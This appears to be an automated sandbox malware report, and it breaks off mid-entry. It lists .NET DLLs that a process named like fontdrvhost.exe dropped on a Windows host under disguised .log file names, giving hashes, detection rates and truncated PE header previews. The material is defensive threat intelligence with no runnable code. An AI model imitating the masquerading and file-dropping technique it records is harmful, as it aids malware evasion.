                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\CGTrJaEm.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                  • Antivirus: Virustotal, Detection: 69%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\COTaDrJc.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 10%
                                                                  • Antivirus: Virustotal, Detection: 21%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\CQeYyQPa.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  • Antivirus: Virustotal, Detection: 6%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\CTQIQVae.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\CdkYHFFH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                  • Antivirus: Virustotal, Detection: 6%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\CgRzmzKC.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                  • Antivirus: Virustotal, Detection: 69%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\CkrRJHNx.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 8%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\DACRVJoK.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\DEcjsSrF.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\DQsQlVoZ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\DdBAnNSZ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\DnshUSLJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ELDRalsN.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  • Antivirus: Virustotal, Detection: 4%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\EOpBrqDR.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                  • Antivirus: Virustotal, Detection: 6%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\EQFIYaOX.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  • Antivirus: Virustotal, Detection: 6%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\FWXhQVXq.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  • Antivirus: Virustotal, Detection: 20%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\FWzHsBqG.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\FvSbvlyH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\GGiHtSpS.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
